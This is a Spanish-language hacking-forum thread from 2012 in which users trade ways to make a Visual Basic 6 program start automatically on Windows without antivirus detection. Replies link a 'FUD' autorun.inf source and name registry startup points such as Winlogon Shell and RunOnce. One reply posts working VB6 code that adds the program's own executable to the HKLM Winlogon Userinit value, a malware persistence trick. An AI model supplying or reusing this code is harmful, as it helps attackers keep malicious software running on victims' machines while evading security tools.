Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Programación => .NET (C#, VB.NET, ASP) => Programación General => Programación Visual Basic => Mensaje iniciado por: MrSatan en 28 Diciembre 2012, 22:17 PM

Título: Ayuda AutoRuns
Publicado por: MrSatan en 28 Diciembre 2012, 22:17 PM
 Hola queria saber si me darian algunas formas de crear autoruns desde vb6 ya que la que uso es muy simple y super detectada por eso quiero saber si hay otras formas...

Gracias.
Título: Re: Ayuda AutoRuns
Publicado por: BlackZeroX en 28 Diciembre 2012, 23:42 PM
.
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL). (http://foro.elhacker.net/analisis_y_diseno_de_malware/src_autoruninf_fud_pensaste_que_ya_no_servia_lol-t294797.0.html)

Dulces Lunas!¡.
Título: Re: Ayuda AutoRuns
Publicado por: MrSatan en 29 Diciembre 2012, 03:41 AM
Cita de: BlackZeroX (Astaroth) en 28 Diciembre 2012, 23:42 PM
.
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL). (http://foro.elhacker.net/analisis_y_diseno_de_malware/src_autoruninf_fud_pensaste_que_ya_no_servia_lol-t294797.0.html)

Dulces Lunas!¡.

Muchas gracias por comentar esa también la conocia ahora probe una que se crea en
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"    si alguno tiene otras y las quiere compartir me viene de 10.

un saludo.      
Título: Re: Ayuda AutoRuns
Publicado por: BlackZeroX en 29 Diciembre 2012, 08:39 AM
.
@MrSatan
Existe un botón llamado Buscar!¡.

Aun así esta duda es mas sobre INFORMACIÓN que de código (independientemente del lenguaje).

Análisis y Diseño de Malware
[Recopilatorio] Herramientas, manuales y códigos de los usuarios (Construcción) (http://foro.elhacker.net/analisis_y_diseno_de_malware/recopilatorio_herramientas_manuales_y_codigos_de_los_usuarios_construccion-t255646.0.html).

Windows
F.A.Q. (http://foro.elhacker.net/windows/f_a_q-t101632.0.html)

No recuerdo donde leí lo de inicio por ActiveX, runonce (varios inicios por registro de windows), entre otros (puede que haya sido en el Sub-Foro de Windows o de Análisis de Diseño de Malware).

Dulces Lunas!¡.
Título: Re: Ayuda AutoRuns
Publicado por: Danyfirex en 29 Diciembre 2012, 17:52 PM
esta la hice hace tiempo no se como este de detecciones :S


Código (vb) [Seleccionar]
Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal HKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long


Private Const HKEY_CURRENT_USER = &H80000001
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const KEY_WRITE = &H20006
Private Const REG_SZ = 1



Private Sub Dosyayi_Baslangica_Ekle(ByVal HKey As Long, ByVal MKey As String, ByVal stringKeyVal As String, ByVal subkey As String)
Dim HRKey As Long, StrB As String
Dim retval As Long
    retval = RegOpenKeyEx(HKey, subkey, 0, KEY_WRITE, HRKey)
        If retval <> 0 Then
            Exit Sub
        End If
    StrB = stringKeyVal & vbNullChar
    retval = RegSetValueEx(HRKey, MKey, 0, REG_SZ, ByVal StrB, Len(StrB))
    RegCloseKey HRKey
End Sub

Private Sub Command1_Click()

Dim sMyPath As String

file = "C:\Users\Pink\Desktop\Anotador.exe"
sMyPath = (App.Path & "\" & App.EXEName & ".exe")
Call Dosyayi_Baslangica_Ekle(HKEY_LOCAL_MACHINE, "Userinit", "C:\Windows\system32\userinit.exe," & sMyPath, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")

End Sub


Saludos
Sólo texto | Texto con Imágenes